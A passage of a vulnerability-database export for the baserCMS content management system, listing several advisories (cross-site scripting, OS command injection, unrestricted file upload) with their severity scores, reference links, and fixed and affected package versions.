url https://github.com/baserproject/basercms/commit/18f426d63e752b4d22c40e9ea8d1f6e692ef601c
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-51450
reference_id CVE-2023-51450
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-51450
5
reference_url https://github.com/advisories/GHSA-77fc-4cv5-hmfr
reference_id GHSA-77fc-4cv5-hmfr
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-77fc-4cv5-hmfr
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr
reference_id GHSA-77fc-4cv5-hmfr
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2023-51450, GHSA-77fc-4cv5-hmfr
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-uedz-j2vn-cbea
27
url VCID-xpsb-2yux-g3cf
vulnerability_id VCID-xpsb-2yux-g3cf
summary
Cross-site Scripting
Improper neutralization of JavaScript input in the blog article editing function of baserCMS allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-20683
reference_id
reference_type
scores
0
value 0.00203
scoring_system epss
scoring_elements 0.42402
published_at 2026-06-05T12:55:00Z
1
value 0.00203
scoring_system epss
scoring_elements 0.42327
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-20683
1
reference_url https://basercms.net/security/JVN64869876
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN64869876
2
reference_url https://github.com/baserproject/basercms/commit/88ccc61e5656b05dd13204d61de706efaa2cd0b1
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/88ccc61e5656b05dd13204d61de706efaa2cd0b1
3
reference_url https://jvn.jp/en/jp/JVN64869876/index.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN64869876/index.html
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-20683
reference_id CVE-2021-20683
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-20683
fixed_packages
0
url pkg:composer/baserproject/basercms@4.4.5
purl pkg:composer/baserproject/basercms@4.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-hpk4-a6tr-3ffe
12
vulnerability VCID-j37y-gws9-ake9
13
vulnerability VCID-jby7-s5ez-dqb3
14
vulnerability VCID-k575-suuf-7bhf
15
vulnerability VCID-k5qv-4yp3-zbgf
16
vulnerability VCID-khft-xvrw-g3dr
17
vulnerability VCID-kmpp-6j49-pqfz
18
vulnerability VCID-mfm9-gsh3-ubg8
19
vulnerability VCID-nxrf-64er-xbfx
20
vulnerability VCID-p695-t9ye-v3ga
21
vulnerability VCID-pd8c-9d7z-zkhg
22
vulnerability VCID-sqr4-v889-tff8
23
vulnerability VCID-u16w-rbuk-ybfs
24
vulnerability VCID-uedz-j2vn-cbea
25
vulnerability VCID-y2sz-c6vb-pkdp
26
vulnerability VCID-zqd4-rdem-jfgk
27
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5
aliases CVE-2021-20683, GHSA-v9w8-hq92-v39m
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xpsb-2yux-g3cf
28
url VCID-y2sz-c6vb-pkdp
vulnerability_id VCID-y2sz-c6vb-pkdp
summary
baserCMS Update Functionality Vulnerable to OS Command Injection
### Summary
The latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.
Due to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.

### Details
Please refer to the attached materials.
[OS Command Injection (baserCMS update feature).pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)

### Impact
An authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30877
reference_id
reference_type
scores
0
value 0.00063
scoring_system epss
scoring_elements 0.19955
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30877
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30877
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30877
6
reference_url https://github.com/advisories/GHSA-m9g7-rgfc-jcm7
reference_id GHSA-m9g7-rgfc-jcm7
reference_type
scores
url https://github.com/advisories/GHSA-m9g7-rgfc-jcm7
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30877, GHSA-m9g7-rgfc-jcm7
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y2sz-c6vb-pkdp
29
url VCID-zqd4-rdem-jfgk
vulnerability_id VCID-zqd4-rdem-jfgk
summary
baserCMS has a cross-site scripting vulnerability in blog posts.

### Target
baserCMS 5.2.1 and earlier versions

### Vulnerability

Malicious JavaScript may be executed in blog posts.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information.
https://basercms.net/security/JVN_20837860

### Credits

Gai Tanaka@Mitsui Bussan Secure Directions, Inc.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30879
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30879
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30879
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30879
6
reference_url https://github.com/advisories/GHSA-jmq3-x8q7-j9qm
reference_id GHSA-jmq3-x8q7-j9qm
reference_type
scores
url https://github.com/advisories/GHSA-jmq3-x8q7-j9qm
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30879, GHSA-jmq3-x8q7-j9qm
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zqd4-rdem-jfgk
30
url VCID-zsgc-fnen-b7a6
vulnerability_id VCID-zsgc-fnen-b7a6
summary
Unrestricted Upload of File with Dangerous Type
baserCMS is a Content Management system. Prior to version 4.7.5, any file may be uploaded on the management system of baserCMS. Version 4.7.5 contains a patch.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-25655
reference_id
reference_type
scores
0
value 0.00561
scoring_system epss
scoring_elements 0.68669
published_at 2026-06-04T12:55:00Z
1
value 0.00561
scoring_system epss
scoring_elements 0.6871
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-25655
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/commit/922025a98b0e697ab78f6a785a004e0729aa9100
3
reference_url https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/commit/9297629983ed908c7f51bf61a0231dde91404ebd
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-25655
reference_id CVE-2023-25655
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-25655
6
reference_url https://github.com/advisories/GHSA-mfvg-qwcw-qvc8
reference_id GHSA-mfvg-qwcw-qvc8
reference_type
scores
url https://github.com/advisories/GHSA-mfvg-qwcw-qvc8
7
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8
reference_id GHSA-mfvg-qwcw-qvc8
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:30:57Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-mfvg-qwcw-qvc8
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.5
purl pkg:composer/baserproject/basercms@4.7.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-jby7-s5ez-dqb3
9
vulnerability VCID-k5qv-4yp3-zbgf
10
vulnerability VCID-khft-xvrw-g3dr
11
vulnerability VCID-mfm9-gsh3-ubg8
12
vulnerability VCID-nxrf-64er-xbfx
13
vulnerability VCID-p695-t9ye-v3ga
14
vulnerability VCID-pd8c-9d7z-zkhg
15
vulnerability VCID-sqr4-v889-tff8
16
vulnerability VCID-u16w-rbuk-ybfs
17
vulnerability VCID-uedz-j2vn-cbea
18
vulnerability VCID-y2sz-c6vb-pkdp
19
vulnerability VCID-zqd4-rdem-jfgk
20
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5
aliases CVE-2023-25655, GHSA-mfvg-qwcw-qvc8
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zsgc-fnen-b7a6
Fixing_vulnerabilities
Risk_score 4.0
Resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.3